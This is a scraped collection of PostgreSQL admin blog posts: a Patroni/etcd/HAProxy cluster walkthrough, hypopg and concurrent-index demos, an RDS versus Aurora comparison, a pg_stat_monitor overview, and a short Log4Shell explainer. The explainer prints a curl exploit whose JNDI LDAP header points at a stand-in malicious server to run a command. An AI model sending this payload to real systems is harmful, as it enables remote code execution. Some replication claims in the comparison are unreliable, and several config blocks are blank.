Translate into your own language

Monday, December 30, 2024

STEP BY STEP - HOW TO SETUP PATRONI WITH ETCD AND HAPROXY

 STEP BY STEP - HOW TO SETUP PATRONI WITH ETCD AND HAPROXY

I have taken 2 CentOS EC2 instances:

Machine

Public IP

Private IP

VM1

3.91.208.95

172.31.95.231

VM2

54.146.6.100

172.31.90.199

 

Step 1 – ETCD INSTALLATION AND CONFIGURATION

-          Install etcd on VM1 and VM2.

 #sudo yum install etcd

 -          Edit the configuration file on each node at location - /etc/etcd/etcd.conf.

Below is the conf file for vm1 after edit. Make sure to uncomment as below and keep the appropriate values. If we want to add the cluster node then we have to add the IP for that in

ETCD_INITIAL_CLUSTER” parameter.

 [root@ip-172-31-95-231 etcd]# cat etcd.conf

ETCD_DATA_DIR="/var/lib/etcd/default.etcd"

ETCD_LISTEN_PEER_URLS="http://172.31.95.231:2380"

ETCD_LISTEN_CLIENT_URLS="http://172.31.95.231:2379"

ETCD_NAME="vm1"

#[Clustering]

ETCD_INITIAL_ADVERTISE_PEER_URLS="http://172.31.95.231:2380"

ETCD_ADVERTISE_CLIENT_URLS="http://172.31.95.231:2379"

ETCD_INITIAL_CLUSTER="vm1=http://172.31.95.231:2380,vm2=http://172.31.90.199:2380"

  =============Conf file for vm2=============

 [root@ip-172-31-90-199 etcd]# cat etcd.conf

ETCD_DATA_DIR="/var/lib/etcd/default.etcd"

ETCD_LISTEN_PEER_URLS="http://172.31.90.199:2380"

ETCD_LISTEN_CLIENT_URLS="http://172.31.90.199:2379"

ETCD_NAME="vm2"

#[Clustering]

ETCD_INITIAL_ADVERTISE_PEER_URLS="http://172.31.90.199:2380"

ETCD_ADVERTISE_CLIENT_URLS="http://172.31.90.199:2379"

ETCD_INITIAL_CLUSTER="vm1=http://172.31.95.231:2380,vm2=http://172.31.90.199:2380"

#ETCD_INITIAL_CLUSTER_TOKEN="etcd-cluster"

 Step 2 – Start ETCD on VM1 and VM2

              # sudo systemctl start etcd

              Check the status of ETCD after stating it.

 

Step 3 – Check the cluster member from VM1 and VM2

VM1-

#ETCDCTL_API=3 etcdctl member list --write-out=table -endpoints=http://172.31.95.231:2379

VM2 –

# ETCDCTL_API=3 etcdctl member list --write-out=table --endpoints=http://172.31.90.199:2379


Step 4 - Install PostgreSQL 12 on VM1 and VM2

# sudo yum -y install https://download.postgresql.org/pub/repos/yum/reporpms/E L-7-x86_64/pgdg-redhat-repo-latest.noarch.rpm

# sudo yum -y install epel-release yum-utils

#sudo yum-config-manager --enable pgdg12

#sudo yum install postgresql12-server postgresql12 postgresql12-contrib

Step 5 - Install Python package manager on VM1 and VM2

# sudo yum install python-pip

Step 6 - Upgrade Python package manager VM1 and VM2

# sudo pip install --upgrade "pip < 21.0"

Step 7 - Install Python setuptools

#sudo pip install --upgrade setuptools

Step 8 - Install PostgreSQL database adapter for the Python

#sudo pip install psycopg2-binary

Step 9 - Install Python library to access installed packages metadata

# sudo pip install importlib-metadata

Step 10 – Install Python wheel

# sudo pip install wheel

Step 11 - Install Patroni

# sudo pip install patroni

Step 12 - Install Python etcd client

# sudo pip install python-etcd

Step 13 – Configure patroni config file for VM1 and VM2.

I have created the config file with name pg.yml  and under /var/lib/pgsql/ location for both the nodes. It should be in proper format otherwise there will be lots issue. So I am sharing the way it should be formatted.

Pg.yml in VM1 –

                               

pg.yml  in VM2 –


                                    


Step 14 – Change the ownership of patroni config files(*.yml) to postgres:postgres

#sudo chown postgres:postgres /var/lib/pgsql/pg.yml

Step 15 – Login as a Postgres user and make the directory for Patroni on VM1 and VM2.

#su – postgres

# mkdir /var/lib/pgsql/patroni

Step 16 – Start Patroni on VM1 and VM2. Run below command as Postgres user.

===============From VM1 output should be as below============

-bash-4.2$ patroni pg.yml

The files belonging to this database system will be owned by user "postgres".

This user must also own the server process.

The database cluster will be initialized with locale "en_US.UTF-8".

The default text search configuration will be set to "english".

Data page checksums are disabled.

creating directory /tmp/data ... ok

creating subdirectories ... ok

selecting dynamic shared memory implementation ... posix

selecting default max_connections ... 100

selecting default shared_buffers ... 128MB

selecting default time zone ... UTC

creating configuration files ... ok

running bootstrap script ... ok

performing post-bootstrap initialization ... ok

syncing data to disk ... ok

initdb: warning: enabling "trust" authentication for local connections

You can change this by editing pg_hba.conf or using the option -A, or

--auth-local and --auth-host, the next time you run initdb.

Success. You can now start the database server using:

    /usr/pgsql-12/bin/pg_ctl -D /tmp/data -l logfile start

 2022-04-21 10:58:56.886 UTC [29955] LOG:  starting PostgreSQL 12.10 on x86_64-pc-linux-gnu, compiled by gcc (GCC) 4.8.5 20150623 (Red Hat 4.8.5-44), 64-bit

2022-04-21 10:58:56.886 UTC [29955] LOG:  listening on IPv4 address "172.31.95.231", port 5432

2022-04-21 10:58:56.890 UTC [29955] LOG:  listening on Unix socket "/tmp/.s.PGSQL.5432"

2022-04-21 10:58:56.907 UTC [29955] LOG:  redirecting log output to logging collector process

2022-04-21 10:58:56.907 UTC [29955] HINT:  Future log output will appear in directory "log".

172.31.95.231:5432 - rejecting connections

172.31.95.231:5432 - accepting connections

^C-bash-4.2$

 ==================From VM2 output should be as below========

-bash-4.2$ patroni pg.yml

172.31.90.199:5432 - no response

2022-04-21 11:24:11.514 UTC [4032] LOG:  starting PostgreSQL 12.10 on x86_64-pc-linux-gnu, compiled by gcc (GCC) 4.8.5 20150623 (Red Hat 4.8.5-44), 64-bit

2022-04-21 11:24:11.514 UTC [4032] LOG:  listening on IPv4 address "172.31.90.199", port 5432

2022-04-21 11:24:11.517 UTC [4032] LOG:  listening on Unix socket "/tmp/.s.PGSQL.5432"

2022-04-21 11:24:11.530 UTC [4032] LOG:  redirecting log output to logging collector process

2022-04-21 11:24:11.530 UTC [4032] HINT:  Future log output will appear in directory "log".

172.31.90.199:5432 - accepting connections

172.31.90.199:5432 - accepting connections

-bash-4.2$

Step 17 – Check the status of Patroni from VM1 and VM2.

# systemctl status patroni



VM2 –


Step 18 – Check if all the cluster nodes are part of Patroni configuration.

VM1 –

# patronictl -c /var/lib/pgsql/pg.yml list


VM2 –

#patronictl -c /var/lib/pgsql/pg.yml list


Step 19 – Check if Postgres cluster is started on VM1 and VM2. I had to manually start the cluster on VM2. And run the below command to check which is primary node. If it shows ‘f’ means is it primary.

-bash-4.2$ ./psql -p 5432 -h 172.31.95.231 -U postgres postgres

psql (12.10)

postgres=# select pg_is_in_recovery();

 pg_is_in_recovery

-------------------

 f

VM2 -

-bash-4.2$ ./psql -p 5432 -h 172.31.90.199 -U postgres postgres

psql (12.10)

Type "help" for help.

postgres=# select pg_is_in_recovery();

 pg_is_in_recovery

-------------------

 t

Step 20 – Perform failover testing

#[root@ip-172-31-95-231 ~]# patronictl -c /var/lib/pgsql/pg.yml failover

Candidate ['vm2'] []: vm2



Step 21 – Install HAProxy on VM1

#sudo yum install haproxy

Step 22 – Install SELinux to allow HAProxy to connect to TCP port 5432

              # sudo setsebool -P haproxy_connect_any 1

Step 23 – Configure HAProxy config file. Config file is at /etc/haproxy/ with name haproxy.cfg.

              Modify this configuration file according below.

  

Step 24 - Start the HAProxy server and check the status

#systemctl start haproxy

# systemctl status haproxy

     


             

Step 25 - Check by connecting to the HAProxy, it should route psql to the current primary.

-bash-4.2$ ./psql -p 5000 -h 172.31.95.231 -U postgres postgres

psql (12.10)

Type "help" for help.

 

postgres=#  select inet_server_addr();

 inet_server_addr

------------------

 172.31.95.231

(1 row)

VM2 is my current primary –


 ====================THE END=======================

 

Hypothetical index in Postgres

A hypothetical index in PostgreSQL is a special type of index that doesn't actually exist physically on disk but is "imagined" or "simulated" by PostgreSQL. This allows you to evaluate the potential benefits of an index without incurring the cost of creating it.

Hypothetical indexes are used primarily for performance tuning and query optimization. You can analyze how a query would behave if a particular index were to exist, helping you decide whether creating the index is worthwhile.

#Install the extension

CREATE EXTENSION hypopg ;

\dx

Create a hypothetical index

 CREATE TABLE hypo (id integer, val text) ;

INSERT INTO hypo SELECT i, 'line ' || i FROM generate_series(1, 100000) i ;

VACUUM ANALYZE hypo ;

EXPLAIN SELECT val FROM hypo WHERE id = 1;

SELECT * FROM hypopg_create_index('CREATE INDEX ON hypo (id)') ;

EXPLAIN SELECT val FROM hypo WHERE id = 1;

EXPLAIN ANALYZE SELECT val FROM hypo WHERE id = 1;

  

Manipulate hypothetical indexes

SELECT * FROM hypopg_list_indexes ;

SELECT * FROM hypopg() ;

SELECT indexname, hypopg_get_indexdef(indexrelid) FROM hypopg_list_indexes ;

SELECT hypopg_create_index('CREATE INDEX ON hypo (id, val text_pattern_ops)');

EXPLAIN SELECT * FROM hypo

 

EXPLAIN SELECT * FROM hypo

WHERE id < 1000 and val LIKE 'line 100000%';

 

How to do Index size estimation ?

SELECT indexname,pg_size_pretty(hypopg_relation_size(indexrelid))

FROM hypopg();

 

Test for size validation :

CREATE INDEX ON hypo (id);

CREATE INDEX ON hypo (id, val text_pattern_ops);

SELECT relname,pg_size_pretty(pg_relation_size(oid))

FROM pg_class WHERE relkind = 'i' AND relname LIKE '%hypo%';

  


Concurrent indexes in Postgres

A concurrent index in PostgreSQL refers to an index that is created or rebuilt in a way that allows normal operations (INSERT, UPDATE, DELETE, SELECT) to continue on the table during the process. This feature is especially useful in production environments where downtime or blocking operations need to be minimized.

 Demo -

 create table demo_table ( id int, name varchar(100));

insert into demo_table

select id.*, md5(id::varchar) from generate_series(1,200000) id;

 create index idx_id on demo_table(id);

delete demo_table where id='100000';

 postgres=#

create index idx_id on demo_table(id);

delete from demo_table where id='100000';

Concurrent index demo

drop index idx_id;

create  index concurrently idx_id on demo_table(id);

  

Note :if the creation fails it exists and needs to be dropped:

 

\d demo_table

explain select * from demo_table where id= 100000;

select relpages from pg_class where relname = 'idx_id';

Note - When a create index operations fails in concurrent mode make sure that you drop the index immediately.

One more thing to keep in mind: When you create an index concurrently and there is another session already modifying the data the create index command waits until that other operation completes:


Wednesday, December 14, 2022

Differences between RDS PostgreSQL and Aurora PostgreSQL

Differences between RDS PostgreSQL and Aurora PosgreSQL

1. Storage Differences

RDS PostgreSQL

RDS PostgreSQL uses Amazon Elastic Block Storage (EBS). All data and logs are managed in the EBS volume attached to the instance. EBS volume is localized to a single availability zone and can not be shared by multiple EC2 instances.

RDS PostgreSQL can grow up to 64TB.

RDS PostgreSQL Automatically scales up 5 GB.

Amazon Aurora PostgreSQL

Aurora uses distributed storage which is replicated across 3 availability zones.

Amazon Aurora PostgreSQL can grow up to 128TB.

Aurora PostgreSQL automatically scales up in chuck of 10GB

2. Replica Differences

RDS PostgreSQL –

RDS uses synchronous streaming replication between primary and read replica.

Maximum of 5 read replica can be added to RDS PostgreSQL.

There is synchronous streaming between Primary and read replica.

Replication lag is in seconds. Sometimes it can be 30 seconds.

RDS supports cross region replication.

 Aurora PostgreSQL

Aurora shares storage tier between primary and read replica. Replica in Aurora cluster shares the Storage volume. Aurora does not depend on streaming replication. All of replication happens at storage tier. Hence it is extremely efficient and does not any load on the compute resources.

Aurora supports up to 15 read replicas.

Replication lag is in mili seconds.

supports same region replication because all read replicas shares the storage tier spread across multiple availability zone in the same region.

3.DR Strategies, High Availability and Failover

From disaster recovery prospective cross region replication is an important concept. And we have seen that RDS PostgreSQL support cross region replication.

With Aurora database with no support of cross region but DB strategies can be implemented by way of Global Aurora Database.

For High availability, RDS PostgreSQL can be setup in multi AZ mode with one standby instance and one primary instance across two AZ’s are referred to as multi AZ instance deployment.

In case of any failure RDS automatically failover to the standby instance. By the way this failover can also be a planned failover. In such a setup standby instance can not be used as read.

If there are more than one standby instance in the multi AZ RDS setup then the setup is referred as multi AZ cluster deployment.  In case of failure of primary instance of request for a manual failover, RDB promotes one of the standby instances to become the primary instance. In this setup standby instance can be used as read replica.

RDS PostgreSQL –

RDS supports failover by way of multi AZ instance or cluster setup.

Failover takes 60-120 sec.

RDS uses synchronous replication between primary and standby instances.

 Aurora PostgreSQL

Aurora supports failover by the way of read replica.

Failover takes 30 Seconds.

Aurora shared the storage tier share between the instances to meet the replication requirement.

4.Backups

Both RDS and Aurora PostgreSQL carry out automated backups and they also allow for manual backups. The differences are in the frequency of backups and how the backups are created.

RDS PostgreSQL –

RDS PostgreSQL takes daily backup during backup window. Backup window is controlled by the user.

Slight performance impact during backup.

In case of multi AZ, backups are taken from standby instance.

Point in time recover is slower than the Aurora PostgreSQL.

Aurora PostgreSQL

Aurora PostgreSQL carries out continuous incremental backups.

No performance impact during backup.

Backup are carried out at storage tier.

Point in time recover is faster than the RDS PostgreSQL.


Tuesday, December 14, 2021

What is Log4JShell Vulnerability and how to remediate it

 The Log4J vulnerability, also sometimes referred to as Log4JShell, can be exploited to allow for the complete takeover of the target to run any arbitrary code.

This affects versions of log4j 2.0-beta9 through 2.14.1 – the current advisory is to update to the fixed release version 2.15.0 or greater.

The Exploit

The most simplistic example being:  

curl https://target.domain.tld -H 'X-Api-Version: ${jndi:ldap://malicious_server/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}' -o/dev/null -v

when executed this runs touch /tmp/pwned on the target system.

There are many such examples being tracked at the time of writing which seeks to either exploit the issue or at the very least confirm the presence of the issue.

Step by Step: How to troubleshoot a slow running query in PostgreSQL

Understanding query performance patterns is essentially the foundation for query performance tuning. It, in many ways, dictates how a database cluster evolves. And then there are obviously direct and indirect cost connotations as well.

PostgreSQL provides very detailed statistics through a number of catalog views and extensions that can be easily added to provide more detailed query statistics. With each view focused on a particular aspect, the picture almost always needs to be stitched together by combining different datasets. That requires effort and still, the whole picture might not be complete.

The pg_stat_monitor extension attempts to provide a more holistic picture by providing much-needed query performance insights in a single view. The extension has been evolving over the past year and is now nearing the GA release.

Some Useful Extensions

Currently, you may be relying on a number of extensions to understand how a query behaves, the time taken in planning and execution phases, min/max/meantime values, index hits, query plan, and client application details. Here are some extensions that you might already be very familiar with.

pg_stat_activity

This view is available by default with PostgreSQL. It provides one row per server process along with current activity and query text.

In case you’d like to learn more about it, hop over to the official PostgreSQL documentation here.

pg_stat_statements

This extension is part of the contrib packages provided with the PostgreSQL server. However, you’d have to create the extension manually. It’s a query-wise aggregation of statistical data with min/max/mean/standard deviation for execution and planning times and various useful information and query text.

You can read more about pg_stat_statements at the official PostgreSQL documentation site.

auto_explain

Another useful extension is provided by the PostgreSQL server. It dumps query plans in the server log for any query exceeding a time threshold specified by a GUC

(Grand Unified Configuration).

You can find more about auto_explain here.

pg_stat_monitor

Whilst all previously mentioned views/extensions are great in their own right, one needs to manually combine client/connection information from pg_stat_activity, statistical data from pg_stat_statements, and query plan from auto_analyze to complete the dataset to understand query performance patterns

And that’s precisely the pain that pg_stat_monitor alleviates.

The feature set has been growing over the past year, with it providing, in a single view, all performance-related information that you may need to debug a low performant query.

Feature Set

Some features that were part of earlier releases are already discussed in this blog, however, for completeness, I’m going to discuss those here as well.

  • Time Interval Grouping: Instead of supplying one set of ever-increasing counts, pg_stat_monitor computes stats for a configured number of time intervals; time buckets. This allows for much better data accuracy, especially in the case of high resolution or unreliable networks.
  • Multi-Dimensional Grouping:  While pg_stat_statements groups counters by (userid, dbid, queryid),  pg_stat_monitor uses a more detailed group for higher precision:
    • Bucket ID (bucket),
    • User ID (userid),
    • Database ID (dbid),
    • Query ID (queryid),
    • Client IP Address (client_ip),
    • Plan ID (planid),
    • Application Name (application_name).

This allows you to drill down into the performance of queries coming from particular client addresses and applications, which we at Percona have found to be very valuable in a number of cases.

  • Capture Actual Parameters in the Queries: pg_stat_monitor allows you to choose if you want to see queries with placeholders for parameters or actual query examples.
  • Query Plan: Each SQL is now accompanied by its actual plan that was constructed for its execution. Also, we found having query parameter values is very helpful, as you can run EXPLAIN on it, or easily play with modifying the query to make it run better, as well as making communication about the query clearer when discussing with other DBAs and application developers.
  • Tables Access Statistics for a Statement: This allows us to easily identify all queries that accessed a given table. This set is at par with the information provided by the pg_stat_statements.
  • Histogram: Visual representation is very helpful when it can help identify issues. With the help of the histogram function, you can now view a timing/calling data histogram in response to a SQL query. And yes, it even works in psql.

  • Functions: It may come as a surprise, but we do understand that functions may internally execute statements!!! To help ease the tracking and analysis, pg_stat_monitor now provides a column that specifically helps keep track of the top query for a statement so that you can backtrack to the originating function.
  • Relation Names: Relations used in a query are available in the “relations” column in the pg_stat_monitor view. This reduces work at your and makes analysis simpler and quicker.
  • Query Types: With query classification as SELECT, INSERT, UPDATE or DELETE, analysis becomes simpler. It’s another effort reduced at your end, and another simplification by pg_stat_monitor.

  • Query MetadataGoogle’s Sqlcommenter is a useful tool that in a way bridges that gap between ORM libraries and understanding database performance. And we support it. So, you can now put any key value data in the comments in /* … */ syntax (see Sqlcommenter documentation for details) in your SQL statements, and the information will be parsed by pg_stat_monitor and made available in the comments column in pg_stat_monitor view.

  • Logging Error and Warning: As seen in different monitoring/statics collector tools, most of the tools/extensions only monitor the successful queries. But in many cases, monitoring ERROR, WARNING, and LOG give meaningful information to debug the issue. pg_stat_monitor not only monitors the ERROR/WARNINGS/LOG but also collects the statistics about these queries. In PostgreSQL queries with ERROR/WARNING there is an error level (elevel), SQL Code (sqlcode), and an error message is attached. Pg_stat_monitor collects all this information along with its aggregates.

We’ve Come a Long Way

What started as a concept is now nearing its final approach. The pg_stat_monitor extension has evolved and has become very feature-rich. We have no doubt about its usefulness for DBAs, performance engineers, application developers, and anyone who needs to look at query performance. We believe it can help save many hours and help identify unexpected query behaviors. 

pg_stat_monitor is available on Github. We are releasing it to get feedback from the community on what we’re doing right and what we should do differently before we release pg_stat_monitor as a generally available version to be supported for years to come.